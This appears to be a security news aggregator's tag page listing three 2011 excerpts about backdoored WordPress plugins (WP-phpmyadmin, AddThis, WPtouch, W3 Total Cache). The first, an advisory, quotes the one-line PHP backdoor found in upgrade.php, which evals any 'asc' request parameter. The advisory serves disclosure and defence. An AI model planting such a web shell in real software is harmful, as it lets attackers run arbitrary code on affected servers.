Backdoor | DataProtectionCenter.com

WP-phpmyadmin WordPress plugin – Delete it now

23

Jun

2011

If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on. On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file: <?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?> This is not part of the plugin, and should be removed […]

Category Security Written by Sucuri 0 Comments

WordPress plugins hacked – Understanding the backdoor

22

Jun

2011

If you haven’t heard about it already, yesterday three popular WordPress plugins (AddThis, WPtouch, and W3 Total Cache) had a malicious backdoor added to them via the plugin repository. That lead to WordPress.org resetting all passwords as a precaution. You can read about it here: Passwords Reset. I must note that the WP.org team did […]

Category Security Written by Sucuri 0 Comments

WordPress plugins Trojanised, spotted, fixed

22

Jun

2011

WordPress just announced that the source code of three plugins for its popular blog-hosting software was maliciously modified. Plugins consist of add-in modules which you install on your WordPress server in order to implement additional functionality, instead of writing all the needed code yourself. Where you might use a DLL with a Windows program – […]

Category General Written by Naked Security - Sophos 0 Comments

The Latest in IT Security

Posts Tagged ‘Backdoor’

WP-phpmyadmin WordPress plugin – Delete it now

WordPress plugins hacked – Understanding the backdoor

WordPress plugins Trojanised, spotted, fixed

Categories

Featured

Archives

Latest Comments

About Us

Contact Us